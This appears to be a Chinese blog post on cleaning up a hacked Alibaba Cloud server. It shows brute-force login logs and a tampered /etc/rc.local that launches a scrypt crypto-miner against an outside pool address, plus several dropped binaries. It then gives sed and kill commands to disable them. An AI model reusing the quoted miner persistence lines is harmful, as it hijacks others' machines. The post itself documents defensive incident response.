`

解决阿里云主机收到攻击的问题

阅读更多

攻击类型:

主要是后门和肉鸡行为



 

先解决后门的问题:

步骤

(1)搞清楚后门文件的来历(是如何产生的)

(2)删除后门文件

具体做法:

使用定时器 定期删除后门文件

待删除的文件列表:

(a)/usr/bin/acpid

(b)/usr/bin/bsd-port/agent

定时器要执行的脚本:

 

定时器:

 

如何解决肉鸡行为呢?

查看/var/log/secure ,看到确实被多次尝试登陆

[root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq
apache from 121.42.0.30
ftp from 121.42.0.30
invalid user admin
invalid user test
invalid user user
mail from 121.42.0.30
root from 121.42.0.30

 

发现可疑进程:

 

 

如何提高安全性?

我觉得应该有一个机制:

当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信

 

 查看root的home目录下的.bash_history

终于发现了猫腻:

 

同时还修改我系统核心文件/etc/rc.local

 于是查看/etc/rc.local 的修改记录:

[root@iZ25tti3rxdZ ~]# stat /etc/rc.local

  File: `/etc/rc.local'

  Size: 390       Blocks: 8          IO Block: 4096   regular file

Device: ca01h/51713dInode: 787612      Links: 1

Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)

Access: 2016-01-10 16:34:59.807094407 +0800

Modify: 2015-12-07 11:23:07.160211728 +0800

Change: 2015-12-07 11:23:07.160211728 +0800

 

 说明在2015-12-07 11:23:07被人恶意修改过

再看看修改成啥样了:

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

 

touch /var/lock/subsys/local

/tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk

/mnt/linsx

/mnt/linsx

/mnt/linsx

/mnt/linsx

/tmp/linex

/tmp/linex

/tmp/2897

/tmp/2897

~                           

 

 

正常的:

 

解决方法:

sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local

sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local

sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local

 

 异常进程:

[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep

root     16790     1  0 16:48 ?        00:00:00 /usr/bin/acpid

root     16804 16790  0 16:48 ?        00:00:00 /usr/bin/acpid

root     16805 16804  0 16:48 ?        00:00:00 /usr/bin/acpid

如何杀*死异常进程:

ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}

 

上述代码是在定时器中执行的,每10分钟执行一次 

 

 

  • 大小: 68.1 KB
  • 大小: 36.3 KB
  • 大小: 6.6 KB
  • 大小: 13.8 KB
  • 大小: 38.6 KB
  • 大小: 19.3 KB
  • 大小: 41.7 KB
  • 大小: 35.1 KB
  • 大小: 17.7 KB
分享到:
评论

相关推荐

    09_12_阿里云主机配置_ffmpeg编译

    09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云...

    阿里云主机发布wordpress网站

    阿里云主机发布WordPress网站 WordPress是一种流行的开源内容管理系统(Content Management System,CMS),广泛应用于博客、新闻、商业等网站。为了发布WordPress网站,需要在阿里云主机上安装和配置WordPress...

    阿里云虚拟主机操作

    阿里云虚拟主机操作

    阿里云主机是什么.docx

    3. **高可用性和安全性**:阿里云主机采用硬件冗余设计,具有抵御ARP攻击和MAC欺骗的能力,同时具备强大的抗DDoS攻击能力。其基于大规模的服务器集群,硬件设备全部冗余,大大降低了单点故障的风险。 4. **操作系统...

    阿里云主机网站迁移.doc

    阿里云主机网站迁移是一项常见的操作,特别是在业务拓展或者优化服务器配置时。以下是对这个过程的详细解释: 1. **提取备份**: 在迁移前,首先需要确保网站数据的安全。登录原有服务器的管理面板,找到“工具...

    远程连接阿里云主机上的MySQL

    本篇将详细介绍如何使用Qt编程框架进行远程连接阿里云主机上的MySQL数据库。 首先,要进行远程连接,你需要确保你的阿里云MySQL实例已经开启了公网访问权限。这通常可以在阿里云控制台的数据库实例配置中设置。记得...

    阿里云安全解决方案介绍.pptx

    * 阿里云安全解决方案提供了多种云安全产品,例如云安全组防火墙、云主机入侵防护、云 WEB 应用防火墙、云数据库防火墙、云安全开发解决方案等。 * 这些产品旨在保护云用户和云服务的安全和隐私,提供了多方面的安全...

    简单阿里云主机环境搭建

    简单阿里云主机环境项目搭建。现在很多服务都部署在云服务上,最近项目也要发布到云上,特写此文章。有需要部署云服务的小伙伴可以参考下。

    生成阿里云ecs主机监控报表go语言源码

    综上所述,这个项目提供了一种使用Go语言结合阿里云ECS监控API来收集和分析ECS主机性能数据的方法。开发人员可以学习如何使用Go语言进行API调用,处理监控数据,以及如何结合Shell脚本来实现定时任务。同时,对于...

    2020阿里云产品图标.pptx

    在阿里云产品图标大全中,我们还可以看到阿里云的各种解决方案,例如云基础应用、数据存储解决方案、安全解决方案等。这些解决方案为用户提供了全面的云计算能力和应用开发能力。 阿里云产品图标大全是阿里云产品和...

    阿里云数据中台系列白皮书合集.zip

    二、阿里云数据中台行业解决方案白皮书 阿里云数据中台-服饰行业消费者个性化服务解决方案 阿里云数据中台-金融行业数据资产管理解决方案 阿里云数据中台-金融行业线上理财业务数字化运营解决方案 阿里云数据中台-...

    阿里云产品图标大全.zip

    总之,"阿里云产品图标大全.zip"是一个宝贵的资源库,它包含了阿里云全系列产品的图标,为那些需要在设计和展示中使用阿里云元素的用户提供了一站式的解决方案。无论你是技术专家还是视觉设计师,这个压缩包都将极大...

    阿里云安全与云等保合规方案合集.zip

    阿里云等级保护2.0解决方案与持续安全运营方案 阿里云-等保合规安全方案报价表; 阿里云安全整体解决方案; 阿里云等保2.0解读视频; 阿里云安全白皮书; 阿里云大数据安全实践; 阿里面向大规模并发实时数仓业务...

    阿里云安全整体解决方案.pptx

    云上客户对安全投入的驱动力 特定安全事件的产品方案 安全防护的木桶理论 ...云上安全整体解决方案 云上系统等保合规“一站式”解决方案 传统安全体系到云安全体系的转变 混合云态势感知解决方案 云上安全“三字经”

    阿里云等级保护2.0综合解决方案.rar

    信息安全等级保护、阿里云云上等保建设、阿里云等保解决方案、安全运营体系

    阿里云安全解决方案介绍.ppt

    阿里云安全解决方案介绍

    关于阿里云监控(部署)

    阿里云主机手工安装是指在阿里云主机上手工安装阿里云云监控 Agent 的过程。选择相应的选项进行安装,然后按照安装向导进行操作,即可完成阿里云云监控的部署。 阿里云监控的部署过程相对简单,只需要按照相应的...

    阿里云虚拟主机主要优势

    阿里云河南授权服务中心提供全面的技术支持和客户服务,包括但不限于电话咨询、在线客服等多种联系方式,帮助企业解决使用过程中遇到的问题,并提供最新的优惠活动信息。 综上所述,阿里云虚拟主机以其低成本、高效...

    4G模块连接阿里云调试

    "4G模块连接阿里云调试" ...规则的基本格式为:阿里云IoT收到4G发送的数据,IOT把收到的数据转发给MQTT的订阅者。 本文详细介绍了如何使用4G模块连接阿里云IoT平台,并使用MQTT.fx工具进行调试和测试。OMUX

    阿里云paas的介绍,很有价值

    通过真实案例,我们可以了解到如何利用阿里云PaaS提升业务效率,解决具体问题,并实现业务的快速迭代。 平台服务部分会深入解析阿里云PaaS的管理控制台和API,让开发者了解如何便捷地使用和管理云资源。讨论内容...

Global site tag (gtag.js) - Google Analytics